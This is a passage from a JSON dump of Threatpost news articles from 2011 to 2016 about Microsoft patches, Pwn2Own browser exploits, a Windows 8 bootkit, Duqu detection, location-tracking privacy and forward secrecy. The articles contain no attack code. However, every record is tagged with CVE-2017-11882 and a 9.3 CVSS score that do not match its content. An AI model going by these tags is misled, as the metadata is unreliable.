The company\u2019s detections show a major drop in Nitol infections since September, but there are still more than 200,000 infections in October.\n\n \n\n", "cvss3": {}, "published": "2012-10-24T17:59:06", "type": "threatpost", "title": "Nitol Infections Fall, But Malware Still Popping Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "href": "https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/77149/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:08", "description": "Microsoft will release seven bulletins in the [October Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-oct>) next week, fixing 20 total vulnerabilities in Windows, Office, Lync and SQL Server. Only one of the bulletins is rated critical, while the six others are rated important.\n\nThe one critical bulletin affects Microsoft Office 2003, 2007 and 2010 and Microsoft officials said that the bug it will fix can be used for remote code execution. The remaining six bulletins, which all are rated important, also can be used for remote code execution. \n\nThe other software affected by the October bulletins includes SharePoint, Groove Server, SQL Server 2000, 2005, 2008 and 2012. \n\nThe one critical bulletin will fix a flaw in Microsoft Word, company officials said.\n\n\u201cToday we\u2019re providing [advance notification](<http://technet.microsoft.com/security/bulletin/ms12-oct>) of the release of seven bulletins, one Critical and six Important, which address 20 vulnerabilities for October 2012. The Critical bulletin addresses vulnerabilities in Microsoft Word. The six Important-rated bulletins will address issues in Windows, Microsoft Office, and SQL Server. 
This release will also address the issue in FAST Search Server first described in [Security Advisory 2737111](<http://technet.microsoft.com/security/advisory/2737111>),\u201d Dustin Childs of Microsoft said.\n\nThat bug in FAST Search Server first came to light in July and also existed in Microsoft Exchange Server. \n\n\u201cThe vulnerabilities exist due to the way that files are parsed by the third-party, Oracle Outside In libraries. In the most severe case of Microsoft Exchange Server 2007 and Microsoft Exchange Server 2010, it is possible under certain conditions for the vulnerabilities to allow an attacker to take control of the server process that is parsing a specially crafted file. An attacker could then install programs; view, change, or delete data; or take any other action that the server process has access to do,\u201d Microsoft said in its security advisory at the time.\n", "cvss3": {}, "published": "2012-10-04T18:28:36", "type": "threatpost", "title": "Microsoft to Fix Critical Word Flaw in October Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:25", "id": "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "href": "https://threatpost.com/microsoft-fix-critical-word-flaw-october-patch-tuesday-100412/77083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:34", "description": "[](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>)The same team from VUPEN that took down Google Chrome on Wednesday has succeeded in compromising Internet Explorer 9 on Windows 7, using two separate bugs. The success at the Pwn2Own contest was the result of a heap overflow bug in IE as well as a separate bug in the browser\u2019s protected mode.\n\nThe heap overflow vulnerability exists in many versions of IE, from version 6 through IE 10, which is in consumer preview right now. 
Chaouki Bekrar of VUPEN said that the compromise of IE was quite challenging and that it took two of his team members about six weeks of work to find the bugs and make the exploits work.\n\nThe bug that enabled the team to break out of IE\u2019s protected mode\u2013which is analogous to the sandbox in Google Chrome\u2013is a memory corruption flaw in protected mode itself. As part of the Pwn2Own contest rules, VUPEN will turn over the heap overflow details to TippingPoint, which runs the contest, and they will then pass the information on to Microsoft. The protected mode bypass, however, will stay in VUPEN\u2019s hands.\n\nThe VUPEN team has a large lead in the Pwn2Own contest, after compromising Chrome and IE, as well as writing exploits for several of the public vulnerabilities that TippingPoint handed out at the beginning of the competition. However, another team comprising two former winners, Vincenzo Iozzo and Willem Pinckaers, also has entered the contest. Still, Bekrar said his team didn\u2019t necessarily need to use the IE bugs.\n\n\u201cWe dropped it because we could,\u201d he said.\n\nThe heap overflow bug that VUPEN used to compromise IE enabled the team to get into the browser\u2019s low-integrity area and then they used the memory-corruption flaw in protected mode to get into the high-integrity area.\n\n\u201cThe Chrome sandbox is much harder to escape for us, because we have the bug in protected mode,\u201d Bekrar said.\n\nThe IE bugs enabled the team to bypass ASLR and DEP on Windows, and although the bug also works on IE 10 on Windows 8, Bekrar said that what he\u2019s seen of the forthcoming version of the browser, it will be more difficult to exploit.\n\n\u201cIE 10 is more complicated to exploit because they\u2019ve added some protections to make it harder to use memory leaks and use-after-free bugs,\u201d he said. 
\u201cI think that will make the prizes [in Pwn2Own] go higher.\u201d\n", "cvss3": {}, "published": "2012-03-08T22:56:42", "type": "threatpost", "title": "IE 9 Falls to Pair of Zero Days at Pwn2Own", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:39", "id": "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "href": "https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/76310/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:03", "description": "[](<https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/>)Microsoft plans to issue seven security bulletins in the [January Patch Tuesday](<https://technet.microsoft.com/en-us/security/bulletin/ms12-jan>) release next week, fixing six vulnerabilities rated important and one rated critical. The bugs affect a variety of products, including Windows XP, Vista, Windows 7, Server 2003 and 2008 and Microsoft Developer Tools and Software.\n\nJust three of the seven bulletins Microsoft will issue on Jan. 10 will fix a vulnerability that could lead to remote code execution. The others can either lead to elevation of privilege or information disclosure. However, there is one bulletin that Microsoft has said can also lead to \u201csecurity feature bypass,\u201d something that isn\u2019t typically seen on the company\u2019s security bulletins.\n\n\u201cIn addition, eagle-eyed readers of the summary page will notice an unusual vulnerability classification, \u2018Security Feature Bypass,\u2019 for one of our Important-severity bulletins. SFB-class issues in themselves can\u2019t be leveraged by an attacker; rather, a would-be attacker would use them to facilitate use of another exploit. 
For those interested in learning more, we expect the SRD blog to publish a detailed analysis of the matter on Tuesday,\u201d Microsoft\u2019s Angela Gunn wrote in a blog post.\n\nThe company will release full information on the patches and which vulnerabilities they apply to on Tuesday.\n", "cvss3": {}, "published": "2012-01-06T15:08:03", "type": "threatpost", "title": "Microsoft to Issue Seven Bulletins, One Critical, on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "href": "https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/76067/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:21", "description": "A security researcher who has in the past created low-level rootkits capable of staying resident on an infected machine after reboots, said he has now accomplished the same feat on Windows 8, which hasn\u2019t even hit the shelves yet. Peter Kleissner said he has created a new version of his Stoned bootkit that defeats the pre-boot security checks included in the forthcoming OS and survives reboots.\n\nKleissner is known in the security community for his creation of the [Stoned bootkit](<http://www.stoned-vienna.com/>), a sophisticated form of rootkit that is designed to load from the master boot record and stay resident in memory throughout the boot process. The previous version of the bootkit was designed to work on Windows XP through Windows 7, but the new one that Kleissner has written also works on Windows 8. 
He said in a message on Twitter Thursday that Stoned Lite is a small footprint bootkit that can be loaded from either a USB stick or a CD.\n\nHe said he may also add some other functionality to the software in the near future.\n\n\u201cMight add in-memory patching of msv1_0!MsvpPasswordValidate, so it allows to log on with any password.. nothing new but nice and fancy,\u201d Kleissner said in a later Twitter message.\n\nThe pre-boot security mechanisms in Windows 8 have drawn a lot of scrutiny in recent months, particularly the fact that [Microsoft is implementing a version of UEFI](<https://threatpost.com/secure-boot-windows-8-worries-researchers-092211/>) instead of the traditional BIOS. UEFI includes some functionality that allows Microsoft to require that any software loaded during the boot sequence of a Windows PC be signed by one of the keys loaded into the firmware. Open-source advocates have argued that the technology could allow the company to prevent users from loading alternate operating systems, but Microsoft and [officials from the Linux Foundation](<https://threatpost.com/linux-foundation-says-uefi-doesnt-have-prevent-other-os-installations-110111/>) have said that isn\u2019t necessarily the case.\n\nKleissner said that he notified Microsoft of his work and has given the company the source code of the bootkit and the paper he\u2019s written for a conference presentation.\n\nMicrosoft has not confirmed the details of Kleissner\u2019s claims.\n", "cvss3": {}, "published": "2011-11-17T20:42:19", "type": "threatpost", "title": "New Version of Stoned Bootkit Said to Bypass Windows 8 Secure Boot", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:19", "id": "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "href": "https://threatpost.com/new-version-stoned-bootkit-said-bypass-windows-8-secure-boot-111711/75909/", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:25", "description": "The Hungarian research facility that helped discover Duqu, the [much-blogged about](<https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/>) Trojan, has now released an open-source toolkit that can be used to help detect traces and instances of the worm.\n\nThe Laboratory of Cryptography and System Security (CrySys) at the Budapest University of Technology and Economics developed the [Duqu Detector Toolkit v1.01](<http://www.crysys.hu/duqudetector.html>) to be used on computers and networks where the malware may have already been removed from the system. Duqu \u2013 a cousin of the Stuxnet worm that infected uranium enrichment facilities in Iran, famously had a hard-coded 36 day lifespan. But ystems may still retain certain Duqu files even after the virus has deactivated itself.By focusing on what they refer to as \u201csuspicious files,\u201d the toolkit can \u201cdetect new, modified versions of the Duqu threat,\u201d CrySys said. \n\nLike other toolkits, CrySys claims the tool could still generate false positives and therefore encourages a professional looks over the log files of each test.\n\nAs Threatpost [previously reported](<https://threatpost.com/duqu-installer-contains-windows-kernel-zero-day-110111/>), users can be infected with Duqu after opening a particular Word document that exploits a flaw in Windows\u2019 Win32k TrueType font parsing engine and lead to remote code execution. 
Microsoft has maintained they\u2019re working on a patch for the bug but in the meantime, [released a workaround](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) for the kernel flaw late last week.\n", "cvss3": {}, "published": "2011-11-10T16:17:49", "type": "threatpost", "title": "New Toolkit Able to Track and Trace Duqu Worm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:22", "id": "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "href": "https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/75879/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Redmond, Washington software giant, Microsoft, and Detroit based GM subsidiary, OnStar backtracked on policies widely seen as egregious privacy violations following lawsuits and public outcry. Here\u2019s the news:\n\n**Windows Phone Update Requires User Consent For Tracking**\n\nMicrosoft released their \u201cMango\u201d update, which, according to a report by Tom Warren on [Winrumors](<http://www.winrumors.com/windows-phone-7-5-no-longer-accesses-location-data-without-authorization/>), updates the Windows Phone, addressing widespread accusations and [a related lawsuit](<https://threatpost.com/class-action-lawsuit-accuses-microsoft-illegal-geotagging-090211/>) that the company had been tracking device locations without reasonable consent.\n\nIn a location and privacy FAQ on the Microsoft website, the company staunchly claims that the location information stored within the Windows Phone 7 devices is intended to gather information about nearby Wi-Fi access points and provide users with location based services more efficiently and effectively; this information does not uniquely identify or track devices, they say.\n\nHowever, the company also says they discovered that some of that information had been 
periodically relayed back to Microsoft when users access the camera application and use its US-English voice command feature. (Whoops!) This relay of information, Microsoft claims, is an unintended behavior. The latest update resolves these and other issues. Now users will have to agree if they want the Camera application to tag photo location. Voice Command will no longer request location information at all.\n\nFor more information, read the FAQ [here](<http://www.microsoft.com/windowsphone/en-us/howto/wp7/web/location-and-my-privacy.aspx>).\n\n**OnStar Won\u2019t Force Automated Location Tracking**\n\nOnStar found itself in a similar situation after it was discovered that the vehicle navigation and emergency notification service was to begin [monitoring the speed and location of vehicles](<https://threatpost.com/onstar-track-speed-location-cars-even-after-opting-out-092111/>) equipped with OnStar technology on December 1, even if those owners decided to opt-out or cancel OnStar\u2019s services.\n\nA press release published yesterday on the OnStar website announced that the company is revising their proposed terms and conditions to make it clear that customer data will not be collected after a customer cancels their OnStar service.\n\n\u201cWe realize that our proposed amendments did not satisfy our subscribers,\u201d OnStar President Linda Marshall said in the statement. \u201cThis is why we are leaving the decision in our customers\u2019 hands. We listened, we responded and we hope to maintain the trust of our more than 6 million customers.\u201d\n\nThe appearance of GPS and other location tracking technologies in mobile phones, cars and other devices has [raised concerns among privacy and civil liberties advocates in the U.S. and elsewhere](<https://threatpost.com/location-based-services-raise-privacy-security-risks-082510/>). 
An analysis by the Wall Street Journal found that iPhones running version 4 of the company\u2019s iOS operating system appeared to [track a user\u2019s location and movement](<https://threatpost.com/report-iphones-track-movement-even-location-services-disabled-042511/>) regardless of whether the user enabled or disabled location tracking. Like Microsoft, Apple claimed that the phones weren\u2019t tracking specific users\u2019 movements, just using the company\u2019s huge user base to assemble an accurate list of active cell phone towers and WiFi hotspots. Software vendors, also, have been discovered to be collecting location data, often quite apart from the kind of service they are providing. In just one example, the mobile phone application for the Pandora music streaming service was [found to be harvesting user location data](<https://threatpost.com/pandora-mobile-app-transmits-gobs-personal-data-040611/>). \n\nSecurity experts have wondered, aloud, [how else the company might use the location and movement data that is collected](<https://threatpost.com/iphones-location-and-threats-your-assets-042711/>), including how it might be used by third party advertisers. \n", "cvss3": {}, "published": "2011-09-28T18:07:32", "type": "threatpost", "title": "Blowback: Microsoft, OnStar Pump the Brakes on Location Tracking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:07:09", "id": "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "href": "https://threatpost.com/blowback-microsoft-onstar-pump-breaks-implicit-gps-tracking-092811/75700/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:29", "description": "Microsoft\u2019s lawsuit against the U.S. government for the right to tell its customers when a federal agency is looking at their emails is getting widespread support by privacy advocates. 
For many, Microsoft\u2019s stance lends an important and powerful voice to ongoing efforts to reform the Electronic Communications Privacy Act that is at the heart of Microsoft\u2019s beef with the government. \n\n\u201cWe applaud Microsoft for challenging government gag orders that prevent companies from being more transparent with their customers about government searches of their data,\u201d said Andrew Crocker, staff attorney with the Electronic Frontier Foundation. \n\nFor Crocker and Microsoft, the stance is tied to bigger issues such as free speech and First Amendment rights. \u201cIn nearly all cases, indefinite gag orders and gag orders issued routinely rather than in exceptional cases are unconstitutional prior restraints on free speech and infringe on First Amendment rights,\u201d he said. \n\nThe software giant\u2019s chief legal officer Brad Smith said Microsoft has been required to maintain secrecy about more than 2,500 legal demands over the past 18 months. More than 1,752 (68 percent) of those secrecy orders had no end date. Smith noted that, \u201cThis means we effectively are prohibited forever from telling our customers that the government has obtained their data.\u201d \n\nMicrosoft\u2019s lawsuit challenges the gag order provision in the Electronic Communications Privacy Act (ECPA) that allows courts to force companies that offer cloud storage to say nothing when asked to turn over customer data. Reforms of ECPA have been long fought for by privacy advocates such as the Electronic Privacy Information Center. \n\nAlan Butler, senior counsel at the Electronic Privacy Information Center, said that such secret orders by the government should be the exception, but increasingly the requests have become the rule. \u201cNotice is one of the key protections provided under the Fourth Amendment, and law enforcement efforts to delay or otherwise restrict notice should be viewed skeptically by the courts,\u201d he said. 
\n\nThe ACLU used Microsoft\u2019s lawsuit as an opportunity to call on Congress to implement reforms to the Electronic Communications Privacy Act. \u201cIf Congress fails to include those changes as it considers ECPA reform, then the courts should step in, including in Microsoft\u2019s case, to end the government\u2019s constitutional failure to provide notice,\u201d said Alex Abdo, staff attorney with the ACLU, in a statement.\n\nMicrosoft\u2019s lawsuit is the latest in a string of high-profile battles with the government over privacy issues. Last week, tech firms and privacy advocates banded together to [voice opposition to a draft bill](<https://threatpost.com/burr-feinstein-anti-crypto-bill-slammed-by-critics/117314/>), the Compliance with Court Orders Act of 2016. Then, of course, there is Apple and its battle with the government\u2019s demands to help it crack its own encryption in order to break into an iPhone.\n\nControversial aspects of ECPA have been debated for years. In fact, earlier this week the House Judiciary Committee amended a current ECPA reform bill \u2014 the Email Privacy Act \u2014 by removing a provision that also attempts to fix the notice requirement. The timing of Microsoft\u2019s suit is fortuitous, Butler said. \n\n\u201cI think this lawsuit will provide a much needed venue to address the lack of notice for email warrants,\u201d Butler said. \u201cCongress has had the opportunity in the past to address this problem, but has not yet taken the steps necessary to do so. The court should reaffirm that notice is a critical component of government searches under the Fourth Amendment,\u201d he said. \n\nAs for Microsoft\u2019s hope of victory? EFF\u2019s Crocker said Microsoft has a strong case. 
\u201cGiven the numbers Microsoft lists in the complaint and the statute\u2019s failure to comport with the First Amendment, I think there\u2019s a pretty good likelihood the suit will at the minimum force some changes to the government\u2019s practices or ECPA,\u201d Crocker said. \n\nBecause of the secret nature of such requests, it\u2019s impossible to tell how many secret government information requests businesses receive. One estimate from a 2012 report authored by Texas Southern University\u2019s Thurgood Marshall School of Law called \u201c[Gagged, Sealed & Delivered](<https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2071399>)\u201d (PDF), estimates 30,000 electronic surveillance orders approved by magistrate judges each year. \n\u201cIndividuals have a constitutional right to receive notice when their persons, papers, and effects have been subject to search. The denial of this right is a harm, and prevents realistic engagement by the public on an issue of national importance (privacy),\u201d EPIC\u2019s Butler said. 
\n", "cvss3": {}, "published": "2016-04-15T15:22:02", "type": "threatpost", "title": "Microsoft Wins Widespread Support in Privacy Clash With Govt.", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-15T19:22:02", "id": "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "href": "https://threatpost.com/microsoft-wins-widespread-support-in-privacy-clash-with-government/117458/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "**UPDATE**\u2013As if all of the vulnerabilities in Flash and Windows discovered in the Hacking Team document cache and the 193 bugs Oracle fixed last week weren\u2019t enough for organizations to deal with, HP\u2019s Zero Day Initiative has released four new zero days in Internet Explorer Mobile that can lead to remote code execution on Windows Phones.\n\nThe four vulnerabilities originally were reported to Microsoft as affecting IE on the desktop, and later on it was discovered that they also affected IE Mobile on Windows Phones. Microsoft has patched all of the vulnerabilities in the desktop version of the browser, but the bugs remain open on IE Mobile. ZDI\u2019s original advisories on these flaws said that they were zero days on Internet Explorer, as well. The company updated the advisories late Thursday to reflect the fact that the bugs only affect IE Mobile.\n\n\u201cWe\u2019re aware of the reports regarding Internet Explorer for Windows Phone. A number of factors would need to come into play, and no attacks have been reported. We continue to monitor the situation and will take appropriate steps to protect our customers,\u201d a Microsoft spokesperson said.\n\nEach of the four vulnerabilities is in a different component of the browser, but they all are remotely exploitable. 
The advisories from ZDI say that attackers could exploit these vulnerabilities through typical drive-by attacks.\n\nThe most severe of the four vulnerabilities is a bug in the way that Internet Explorer handles some specific arrays.\n\n\u201cThe vulnerability relates to how Internet Explorer processes arrays representing cells in HTML tables. By manipulating a document\u2019s elements an attacker can force Internet Explorer to use memory past the end of an array of HTML cells. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory from ZDI](<http://www.zerodayinitiative.com/advisories/ZDI-15-359/>) says.\n\nThat vulnerability was discovered as part of the Mobile Pwn2Own contest in November and ZDI disclosed it to Microsoft at the time. ZDI has a policy of disclosing privately reported vulnerabilities after 120 days, even if the affected vendor has not released a patch. Microsoft has not issued patches for any of the four vulnerabilities disclosed by ZDI this week.\n\nAmong the other vulnerabilities the company disclosed is a flaw in how IE handles some objects.\n\n\u201cThe specific flaw exists within the handling of CAttrArray objects. By manipulating a document\u2019s elements an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-360/>) says. \n\nThe other two vulnerabilities are similar, in that they involve IE mishandling certain objects. IE will in some circumstances mishandle CTreePos and CCurrentStyle objects, leading to a dangling pointer that an attacker can reuse. \n\n_This story was updated on July 23 to add context about the flaws only affecting IE Mobile and the comment from Microsoft. _\n\n_Image from Flickr photos of [C_osett](<https://www.flickr.com/photos/mstable/>). 
_\n", "cvss3": {}, "published": "2015-07-23T09:14:36", "type": "threatpost", "title": "Four Zero Days Disclosed in Internet Explorer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-28T14:23:41", "id": "THREATPOST:59C4483705849ADA19D341EFA462DD19", "href": "https://threatpost.com/four-zero-days-disclosed-in-internet-explorer/113911/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:42", "description": "Researchers at HP\u2019s Zero Day Initiative have disclosed full details and proof-of-concept exploit code for a series of bugs they discovered that allow attackers to bypass a key exploit mitigation in Internet Explorer.\n\nThe disclosure is a rarity for ZDI. The company typically does not publish complete details and exploit code for the bugs it reports to vendors until after the vulnerabilities are fixed. But in this case, Microsoft has told the researchers that the company doesn\u2019t plan to fix the vulnerabilities, even though the bugs were serious enough to win ZDI\u2019s team a $125,000 [Blue Hat Bonus](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>) from Microsoft. The reason: Microsoft doesn\u2019t think the vulnerabilities affect enough users.\n\nThe vulnerabilities that the ZDI researchers submitted to Microsoft enable an attacker to fully bypass ASLR (address space layout randomization), one of the many mitigations in IE that help prevent successful exploitation of certain classes of bugs. ZDI reported the bugs to Microsoft last year and disclosed some limited details of them in February. 
The researchers waited to release the full details until Microsoft fixed all of the flaws, but Microsoft later informed them that they didn\u2019t plan to patch the remaining bugs because they didn\u2019t affect 64-bit systems.\n\n\u201cIn this situation, Microsoft\u2019s statement is technically correct \u2013 64-bit versions do benefit from ASLR more than 32-bit versions. A 64-bit system has a much larger address space than a 32-bit system, which makes ASLR that much more effective. However what is lost here is that the bypass described and submitted only works for 32-bit systems, which is the default configuration on millions of systems. To demonstrate this, we have released proof-of-concept (PoC) code to demonstrate this bypass on Windows 7 and Windows 8.1,\u201d a blog [post](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-and-back-again-a-journey-through-bounty-award-and/ba-p/6756465#.VYgirOs2ItZ>) from Dustin Childs of HP says. \n\nChilds, who is a former Microsoft security official, said ZDI is releasing the details and [PoC code](<https://github.com/thezdi/abusing-silent-mitigations>) in order to give users as much information as possible to defend themselves against potential attacks.\n\n\u201cSince Microsoft feels these issues do not impact a default configuration of IE (thus affecting a large number of customers), it is in their judgment not worth their resources and the potential regression risk. 
We disagree with that opinion and are releasing the PoC information to the community in the belief that concerned users should be as fully informed as possible in order to take whatever measures they find appropriate for their own installations,\u201d he said.\n\nMicrosoft did not provide a comment in time for publication of this story.\n", "cvss3": {}, "published": "2015-06-22T15:11:28", "type": "threatpost", "title": "HP Releases Details, Exploit Code for Unpatched IE Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-06-25T21:13:37", "id": "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "href": "https://threatpost.com/hp-releases-details-exploit-code-for-unpatched-ie-flaws/113408/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:53", "description": "Dennis Fisher and Mike Mimoso talk about the [VENOM vulnerability](<https://threatpost.com/venom-flaw-in-virtualization-software-could-lead-to-vm-escapes-data-theft/112772>), the idea of marketing bugs, Microsoft\u2019s new [Edge browser security features](<https://threatpost.com/microsoft-edge-browser-seen-as-a-big-security-upgrade/112738>) and the awesome [CSI: Cyber finale](<https://threatpost.com/the-triumphant-finale-of-csi-cyber/112820>).\n\nDownload: [digital_underground_203.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_203.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2015-05-15T11:34:18", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso on VENOM, Marketing Bugs, and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-18T17:26:21", "id": "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "href": "https://threatpost.com/threatpost-news-wrap-may-15-2015/112852/", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:53", "description": "Microsoft yesterday added four cryptographic cipher suites to its default priority ordering list in Windows, a move that brings Perfect Forward Secrecy to the operating system.\n\n[Update 3042058](<https://technet.microsoft.com/en-us/library/security/3042058>) is available for now only on the Microsoft Download Center, affording users the opportunity to test the ciphers before bringing them into their respective IT environments. The updates are available for Windows 7, 8 and 8.1 32- and 64-bit systems, as well as Windows Server 2008 R2 and Windows Server 2012 and 2012 R2 system.\n\n\u201cThe update adds the following cryptographic cipher suites to the default list in all affected operating systems and includes improvements to the cipher suite priority ordering,\u201d Microsoft said. The suites are:\n\n * TLS_DHE_RSA_WITH_AES_256_GCM_SHA384\n * TLS_DHE_RSA_WITH_AES_128_GCM_SHA256\n * TLS_RSA_WITH_AES_256_GCM_SHA384\n * TLS_RSA_WITH_AES_128_GCM_SHA256\n\nBringing Perfect Forward Secrecy to Windows is an important step forward, especially in context of the expressed desire of many [large technology providers to encrypt everything](<https://threatpost.com/twitter-hardens-services-with-perfect-forward-secrecy/103026>) in the wake of Snowden and NSA/GCHQ surveillance. PFS ensures that new private keys are negotiated for every session, meaning that if a key is ever compromised in the future, only that particular session will be at risk. In order to attack each session, each key would have to be attacked separately.\n\n\u201cPFS is definitely important when considering attackers with virtually unlimited resources to eavesdrop and crack encryption keys,\u201d said Craig Young, a researcher at Tripwire.\n\nWhile experts are generally applauding Microsoft\u2019s foray into PFS, Microsoft is late to the party. 
Google, for example, has had the capability in its products for close to three years. Others, including Dropbox, Facebook, Twitter, and Tumblr, all support PFS and have done so for at least a year. Microsoft, however, last year did bring [PFS to its web-based email service Outlook.com](<https://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965>).\n\nPFS, while a step forward, is not perfect. There is a performance hit, which Microsoft acknowledges in its advisory, because of its higher computing requirements. It urges Windows server administrators to test for jumps in resource consumption as connections encrypted with TLS/SSL scale up on the client and server side. Kenneth White, director of the Open Crypto Audit Project (OCAP), said Microsoft\u2019s use of crypto suites such as DHE rather than ECDHE, for example, could exacerbate the performance issue.\n\n\u201cIt\u2019s an important milestone, but their choices are a little puzzling,\u201d White said. \u201cFirst, the Forward Secrecy suites (DHE) are ephemeral but they don\u2019t use elliptic curves, and are actually one of the least efficient PFS suites. It\u2019s also good to see the rollout of authenticated modes (AEAD, here GCM). So, this is certainly forward progress, but it would be nice to see efficient authenticated ephemeral Diffie-Hellman ECC suites on the near-term road map.\u201d\n\nWhite said the use of DHE rather than ECDHE, in some cases, causes a twofold to eightfold decrease in performance.\n\n\u201cIf the server has to work harder, the maximum number of simultaneous connections is significantly reduced,\u201d White said. \u201cSimilarly, clients such as web browsers or API peers will have higher load using DHE.\u201d\n\nExperts have been harping on the fact that Perfect Forward Secrecy should be considered a minimum crypto standard, especially with new applications. 
The same goes for HSTS, or [HTTP Strict Transport Security](<https://www.owasp.org/index.php/HTTP_Strict_Transport_Security>), which is a security policy header that tells browsers to communicate only over HTTPS.\n\n\u201cManaging your crypto by removing old ciphers and in this case adding new ones is a good housekeeping move for Microsoft,\u201d said Jon Rudolph, principal software engineer at Core Security. \u201cKnowing your cipher suites is like knowing what you\u2019re eating: it\u2019s a fundamental building block of trust, and it pays to read the label.\u201d\n", "cvss3": {}, "published": "2015-05-13T12:14:00", "type": "threatpost", "title": "Microsoft Brings Perfect Forward Secrecy to Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-15T18:33:16", "id": "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "href": "https://threatpost.com/new-crypto-suites-bring-perfect-forward-secrecy-to-windows/112783/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:01", "description": "SAN FRANCISCO\u2013One of the downsides to being a software company with a huge customer base is that your products are going to be prime targets for attackers. But the flip side to that coin is that you\u2019re going to gather a _lot_ of data about vulnerabilities and attacks.\n\nMicrosoft has been collecting that data for years now and has used it to help inform decisions about new defensive technologies, product improvements and patching strategies. The company shared some of that information Tuesday at the RSA Conference here and some of the data they have is quite revealing. One of the most intriguing bits to come out of the numbers is that while there are still large numbers of remote code execution vulnerabilities being disclosed every year, attackers are exploiting fewer and fewer of them.\n\n\u201cVulnerabilities represent potential risk. 
